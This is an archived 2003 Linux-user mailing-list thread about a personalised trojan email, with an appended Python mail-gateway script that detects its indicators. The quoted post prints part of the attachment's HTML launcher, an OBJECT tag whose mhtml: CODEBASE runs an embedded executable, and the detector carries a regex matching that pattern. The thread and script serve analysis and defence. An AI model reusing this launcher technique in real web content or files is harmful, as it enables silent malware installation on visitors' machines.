[ale] Interesting trojan attempt?

Debrihmi debrihmi at chaos706.org
Sun Aug 3 16:44:50 EDT 2003


Yeah it's a pain..  Our company is all MS and we got hit on Friday..  Tell ya something, 
when you're in the middle of production the first thing you do is just open your email 
so you can read it and get it out of the way..  Needless to say we had a hell of a time 
(1500 + people); they had to shutdown the server just to get a handle on it..  I hope 
that tomorrow everything is back to normal.. 
 
~ 
Debrihmi 
 
 
 
On Sun, 3 Aug 2003 16:26:55 -0400, David S. Jackson wrote 
> This forwarded message came to me from my pop account at 
> Earthlink.  It has the Subject line: 
>  
> Subject: [admin at sylvester.dsj.net: your account                       
>    vjovvlov] 
>  
> It looked kinda clever.  I don't think I've seen this before. 
> Somehow it snarfed my MX machine's name and stuck it into the 
> subject line and into the To:, Reply-To:, and From: address.  I 
> Almost thought it was real for a second.  I shouldn't be allowing 
> external queries from my internal DNS server anyway, so I'd 
> better make sure that didn't happen. 
>  
> The attachment was a zip file labelled:  message.zip. 
>  
> When I pipe the "message" to less through unzip -p, I get 
> compiled binary output followed by some "launch code" in an html 
> file: 
>  
> <SCRIPT> 
> function malware() 
> { 
> s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); 
> path=unescape(path); 
> document.write(' <title>Message</title><body scroll=no 
> bgcolor=white><FONT face= 
> "Arial" color=black 
> style="position:absolute;top:20;left:90;z-index:100; font-si 
> ze:12px;">No message</center><OBJECT style="cursor:cross-hair" 
> alt="moo ha ha" C 
> LASSID="CLSID:11111111-1111-1111-1111-111111111111" 
> CODEBASE="mhtml:'+path+'\\m 
> essage.html!File://foo.exe"></OBJECT>') 
> } 
>  
> [ lots more html snipped... ] 
>  
> Anyway, I guess you guys see this quite a bit, but I hadn't seen 
> anything quite so personalized before.  (Also, the X-Mailer: 
> attribution was kind of obvious.  And the timestamp was in PDT.) 
>  
> ----- Forwarded message from admin at sylvester.dsj.net ----- 
>  
> Received: from localhost (dsj at localhost [127.0.0.1]) 
> 	by sylvester.dsj.net (8.12.3/8.12.3/Debian-5) with ESMTP id h7385pXI009561 
> 	for <dsj at localhost>; Sun, 3 Aug 2003 04:38:42 -0400 
> Received: from pop.dsj.net [207.217.120.137] 
> 	by localhost with POP3 (fetchmail-5.9.11) 
> 	for dsj at localhost (single-drop); Sun, 03 Aug 2003 04:38:42 -0400 (EDT) 
> Received: from localhost ([211.110.44.18]) 
> 	by tern (EarthLink Mail Service) with SMTP id 19Jdzq2Bj3NZFmh0 
> 	for <dsj at dsj.net>; Sun, 3 Aug 2003 00:46:18 -0700 (PDT) 
> From: admin at sylvester.dsj.net 
> To: Dsj <dsj at dsj.net> 
> Reply-To: admin at sylvester.dsj.net 
> X-Mailer: The Bat! (v1.61) 
> X-Priority: 2 (High) 
> Subject: your account                         vjovvlov 
> MIME-Version: 1.0 
> Content-Type: multipart/mixed; boundary="----------5B228CBD052294B" 
> Message-Id: <200308030046.19Jdzq2Bj3NZFmh0 at tern> 
> Date: Sun, 3 Aug 2003 00:46:18 -0700 (PDT) 
> Status: RO 
> Content-Length: 29765 
> Lines: 402 
>  
> Hello there, 
>  
> I would like to inform you about important information regarding your 
> email address. This email address will be expiring. 
> Please read attachment for details. 
>  
> --- 
> Best regards, Administrator 
> vjovvlov 
>  
> ----- End forwarded message ----- 
>  
> --  
> David S. Jackson                        dsj at dsj.net 
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
> Thank goodness modern convenience is a thing of the 
> remote future. 
> 		-- Pogo, by Walt Kelly 
> _______________________________________________ 
> Ale mailing list 
> Ale at ale.org 
> http://www.ale.org/mailman/listinfo/ale 
 
 
~ 
Debrihmi 
-- 
Member, "Chattahoochee Area Open Source" (http://chaos706.org) 
Member, "Atlanta Linux Enthusiasts (ALE)" (http://ale.org) 
 
-=[ Ask me about Linux and be Amazed ]=- 
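The indicators David lists in the quoted post (a From/Reply-To forged with the recipient's own MX name while the originating hop is an outside address, a Received line that claims to be from localhost but carries a non-loopback IP, a subject padded with spaces and a random token, and a message.zip whose HTML loads an executable through an mhtml: OBJECT CODEBASE) translate directly into mail-gateway checks. The Python script below is an added example, not code from the thread or from the ALE list; the OWN_MAIL_HOSTS set, the two constructed sample messages and the 1 MiB zip-member cap are assumptions made for the demonstration.

```python
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

# Hostnames this site legitimately sends mail as (assumption: the defender fills this in).
OWN_MAIL_HOSTS = {"sylvester.dsj.net", "dsj.net"}

IPV4_RE = r"(\d{1,3}(?:\.\d{1,3}){3})"

# The launcher shape quoted in the thread: an <OBJECT> whose CODEBASE is an
# mhtml: URL whose File:// part names an executable.
LAUNCHER_RE = re.compile(
    r"<OBJECT[^>]*CODEBASE\s*=\s*[\"']?mhtml:[^\"'>]*!File://[^\"'>]*\.exe",
    re.IGNORECASE | re.DOTALL,
)

MAX_MEMBER_BYTES = 1 << 20  # assumed cap: never inflate a huge zip member


def external_origin_ips(msg):
    """Bracketed, non-loopback IPs from Received: headers, newest hop first."""
    ips = []
    for hdr in msg.get_all("Received", []):
        for ip in re.findall(r"\[" + IPV4_RE + r"\]", str(hdr)):
            if not ip.startswith("127."):
                ips.append(ip)
    return ips


def zip_members_with_launcher(msg):
    """Names of files inside .zip attachments that match LAUNCHER_RE."""
    hits = []
    for part in msg.iter_attachments():
        if not (part.get_filename() or "").lower().endswith(".zip"):
            continue
        data = part.get_payload(decode=True) or b""
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    if info.file_size > MAX_MEMBER_BYTES:
                        continue
                    text = zf.read(info.filename).decode("latin-1", "replace")
                    if LAUNCHER_RE.search(text):
                        hits.append(info.filename)
        except zipfile.BadZipFile:
            continue
    return hits


def analyze(raw_bytes, own_hosts=OWN_MAIL_HOSTS):
    """Return (indicator, detail) pairs for one raw RFC 822 message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []

    # 1. Sender claims one of our own mail hosts, yet the earliest hop is external.
    from_dom = parseaddr(str(msg.get("From", "")))[1].rpartition("@")[2].lower()
    ips = external_origin_ips(msg)
    if from_dom in own_hosts and ips:
        findings.append(("spoofed-own-host",
                         f"From claims {from_dom} but originating hop is {ips[-1]}"))

    # 2. A Received line saying "from localhost" with a non-loopback address.
    for hdr in msg.get_all("Received", []):
        m = re.search(r"from\s+localhost\s+\(\[" + IPV4_RE + r"\]\)", str(hdr), re.I)
        if m and not m.group(1).startswith("127."):
            findings.append(("helo-localhost-external", m.group(1)))

    # 3. Subject padded with whitespace before a trailing random-looking token.
    subject = str(msg.get("Subject", ""))
    if re.search(r"\s{3,}\S{6,}$", subject):
        findings.append(("padded-subject-token", subject.split()[-1]))

    # 4. Zip attachment carrying the mhtml: OBJECT launcher.
    for name in zip_members_with_launcher(msg):
        findings.append(("mhtml-object-launcher", name))
    return findings


def build_sample(malicious=True):
    """Constructed test message modeled on the headers quoted in the thread."""
    msg = EmailMessage()
    if malicious:
        msg["Received"] = ("from localhost ([211.110.44.18]) by tern (EarthLink Mail Service) "
                           "with SMTP id 19Jdzq2Bj3NZFmh0 for <dsj@dsj.net>; "
                           "Sun, 3 Aug 2003 00:46:18 -0700 (PDT)")
        msg["From"] = "admin@sylvester.dsj.net"
        msg["Reply-To"] = "admin@sylvester.dsj.net"
        msg["Subject"] = "your account                         vjovvlov"
    else:
        msg["Received"] = ("from mail.example.org ([198.51.100.7]) by tern (EarthLink Mail Service) "
                           "with SMTP id constructed0001 for <dsj@dsj.net>; "
                           "Sun, 3 Aug 2003 09:00:00 -0400 (EDT)")
        msg["From"] = "friend@example.org"
        msg["Subject"] = "lunch on Tuesday?"
    msg["To"] = "Dsj <dsj@dsj.net>"
    msg["X-Mailer"] = "The Bat! (v1.61)"
    msg.set_content("Please read attachment for details.")
    if malicious:
        # Minimal constructed HTML carrying only the indicator string, not a payload.
        html = ('<html><title>Message</title><body>No message'
                '<OBJECT CLASSID="CLSID:11111111-1111-1111-1111-111111111111" '
                'CODEBASE="mhtml:C:\\temp\\message.html!File://foo.exe"></OBJECT>'
                '</body></html>')
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("message.html", html)
        msg.add_attachment(buf.getvalue(), maintype="application",
                           subtype="zip", filename="message.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for kind, detail in analyze(build_sample()):
        print(f"{kind}: {detail}")
    print("clean sample:", analyze(build_sample(malicious=False)))
```

The zip check opens members in memory with a size cap rather than extracting to disk, and the "spoofed own host" rule keys on the earliest hop so that the fetchmail and loopback Received lines added on the recipient's side do not mask the outside origin.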